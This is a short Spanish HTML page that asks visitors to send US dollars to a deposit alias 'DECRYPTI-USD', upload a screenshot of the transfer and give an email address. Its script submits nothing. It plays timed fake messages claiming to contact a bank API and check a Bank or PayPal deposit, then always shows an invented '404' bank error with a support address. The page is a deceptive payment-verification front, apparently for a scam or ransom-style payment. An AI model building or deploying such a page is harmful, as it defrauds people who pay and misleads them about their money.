<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Depósito de USD</title>
    <style>
        body {
            background-color: #222;
            color: #00ff00;
            font-family: Arial, sans-serif;
        }
        .container {
            width: 300px;
            margin: 50px auto;
            padding: 20px;
            background-color: #111;
            border: 2px solid #00ff00;
            border-radius: 10px;
            text-align: center;
        }
        .input-group {
            margin-bottom: 20px;
        }
        .btn {
            background-color: #00ff00;
            color: #222;
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
        .btn-copiar {
            background-color: #ff00ff;
            margin-left: 10px;
        }
        .mensaje-copiado {
            display: none;
        }
    </style>
    

</head>
<body>
    <div class="container">
        <div class="input-group">
            <label for="alias">Alias de Depósito:</label>
            <input type="text" id="alias" value="DECRYPTI-USD" readonly>
            <button class="btn btn-copiar" onclick="copiarAlias()">Copiar</button>
            <span id="mensaje-copiado" class="mensaje-copiado">Copiado!</span>
        </div>
        <div class="input-group">
            <label for="captura">Captura del Envío:</label>
            <input type="file" id="captura">
        </div>
        <div class="input-group">
            <label for="correo">Correo Electrónico:</label>
            <input type="email" id="correo">
        </div>
        <button class="btn" onclick="enviarDatos()">Enviar</button>
    </div>
    <script>
        function enviarDatos() {
    var captura = document.getElementById("captura").files[0];
    var correo = document.getElementById("correo").value;
    var correoRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;

    // Validar el formato del correo y la existencia de la captura
    if (correoRegex.test(correo) && captura) {
        mostrarMensaje("Procesando datos...");
        setTimeout(function () {
            mostrarMensaje("Conectando con API Bank ...");
            setTimeout(function () {
                mostrarMensaje("Comprobando Depósito Bancario / Paypal...");
                setTimeout(function () {
                    mostrarError("Depósito fallido ERROR API BANK 404 ref(err404-40001eRttU) Soporte usdexchange@support.ex.com.ar");
                }, 1000);
            }, 4000);
        }, 7000);
    } else {
        mostrarError("Por favor, ingrese un correo válido y suba una imagen.");
    }
}
        function mostrarMensaje(mensaje) {
    var mensajeFlotante = document.getElementById("mensaje-copiado");
    mensajeFlotante.textContent = mensaje;
    mensajeFlotante.style.display = "inline";
}

function mostrarError(mensaje) {
    var mensajeFlotante = document.getElementById("mensaje-copiado");
    mensajeFlotante.textContent = mensaje;
    mensajeFlotante.style.color = "#ff0000";
    mensajeFlotante.style.display = "inline";
}


         function copiarAlias() {
            var alias = document.getElementById("alias");
            alias.select();
            document.execCommand("copy");
            var mensajeCopiado = document.getElementById("mensaje-copiado");
            mensajeCopiado.style.display = "inline";
        }
    </script>
</body>
</html>
